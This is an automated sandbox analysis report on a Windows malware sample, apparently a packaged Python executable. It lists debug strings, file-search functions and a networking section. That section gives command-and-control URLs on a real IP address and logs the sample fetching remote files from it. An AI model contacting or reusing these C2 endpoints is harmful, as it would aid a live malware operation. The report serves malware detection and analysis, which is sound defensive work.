        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688330642.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB0A2000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685805435.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687322472.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686910903.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687577629.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DChOtFdp9T.exe, 00000001.00000002.1881450400.00007FFE132B1000.00000002.00000001.01000000.00000008.sdmp, _ctypes.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879602509.00007FFE101D7000.00000002.00000001.01000000.00000018.sdmp, _hashlib.pyd.0.dr
        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685320693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686476688.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684844639.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685398039.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1879894522.00007FFE10308000.00000002.00000001.01000000.00000015.sdmp, _asyncio.pyd.0.dr
        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687464798.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: DChOtFdp9T.exe, 00000001.00000002.1879766821.00007FFE10252000.00000002.00000001.01000000.00000017.sdmp, pyexpat.pyd.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881200286.00007FFE1321D000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686660312.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
        Source: Binary string: ucrtbase.pdbUGP source: DChOtFdp9T.exe, 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880512904.00007FFE11ED9000.00000002.00000001.01000000.0000000E.sdmp, _socket.pyd.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: DChOtFdp9T.exe, 00000000.00000003.1683307278.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881008984.00007FFE130C5000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140_1.dll.0.dr
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688752351.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685695268.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmp
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687027078.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686366365.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685177805.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880596191.00007FFE120C6000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687394800.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DChOtFdp9T.exe, 00000000.00000003.1683174444.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1882140131.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686035517.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687990709.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1875750642.00007FFDFB13A000.00000002.00000001.01000000.00000014.sdmp, libcrypto-3.dll.0.dr
        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686550010.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686216151.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880914876.00007FFE12E13000.00000002.00000001.01000000.0000000F.sdmp, select.pyd.0.dr
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688827777.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686729797.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687253081.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1686838745.00000260D1CD3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685584111.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880770005.00007FFE126EB000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688107451.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685966419.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1880682032.00007FFE126C3000.00000002.00000001.01000000.00000010.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1881098109.00007FFE13204000.00000002.00000001.01000000.0000000C.sdmp, _wmi.pyd.0.dr
        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1685896929.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872247576.0000017808110000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DChOtFdp9T.exe, 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1687837125.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DChOtFdp9T.exe, 00000000.00000003.1688439421.00000260D1CD4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DChOtFdp9T.exe, 00000001.00000002.1880262151.00007FFE1150D000.00000002.00000001.01000000.00000012.sdmp, _ssl.pyd.0.dr
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602998300 FindFirstFileExW,FindClose,0_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602998300 FindFirstFileExW,FindClose,1_2_00007FF602998300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF602997900 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF602997900
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF6029B05F4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6029B05F4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A1B0 FindFirstFileExW,FindClose,FindNextFileW,1_2_00007FFE0079A1B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A018 FindFirstFileExA,FindClose,FindNextFileA,1_2_00007FFE0079A018
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\WerFault.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI56402\Jump to behavior

        Networking

        barindex
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: http://01.42.238.250:443/Ye3l
        Source: Malware configuration extractorURLs: http://101.42.238.250/Ye3l
        Source: Joe Sandbox ViewASN Name: CNIX-APChinaNetworksInter-ExchangeCN CNIX-APChinaNetworksInter-ExchangeCN
        Source: global trafficHTTP traffic detected: GET /Ye3l HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 101.42.238.250:443Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: unknownTCP traffic detected without corresponding DNS query: 101.42.238.250
        Source: global trafficHTTP traffic detected: GET /a.txt HTTP/1.1Host: 101.42.238.250User-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /b.txt HTTP/1.1Host: 101.42.238.250User-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /Ye3l HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 101.42.238.250:443Connection: Keep-AliveCache-Control: no-cache
        Source: DChOtFdp9T.exe, 00000001.00000002.1874304688.000001780B8B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
        Source: DChOtFdp9T.exe, 00000001.00000002.1874765026.000001780BC34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250/a.txt
        Source: DChOtFdp9T.exe, 00000001.00000002.1874765026.000001780BC34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250/b.txt
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250/b.txtng.utils
        Source: DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2E0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2B5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250:443/Ye3l
        Source: DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://101.42.238.250:443/Ye3l2G7cghlI
        Source: DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714174593.000001780A559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
        Source: DChOtFdp9T.exe, 00000000.00000003.1683854693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiC
        Source: DChOtFdp9T.exe, 00000000.00000003.1683854693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684554288.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CE2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696125909.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1697440616.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683712452.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696576885.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: DChOtFdp9T.exe, 00000000.00000003.1683854693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684554288.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CE2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696125909.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CDC000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1697440616.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683712452.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696576885.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: DChOtFdp9T.exe, 00000000.00000003.1683854693.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684680424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684004628.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684100382.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1693678108.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684211779.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684440331.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684554288.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696125909.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683395424.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1697440616.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684283969.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703446111.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1703986094.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1684364998.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683487752.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1683712452.00000260D1CD2000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1696738812.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 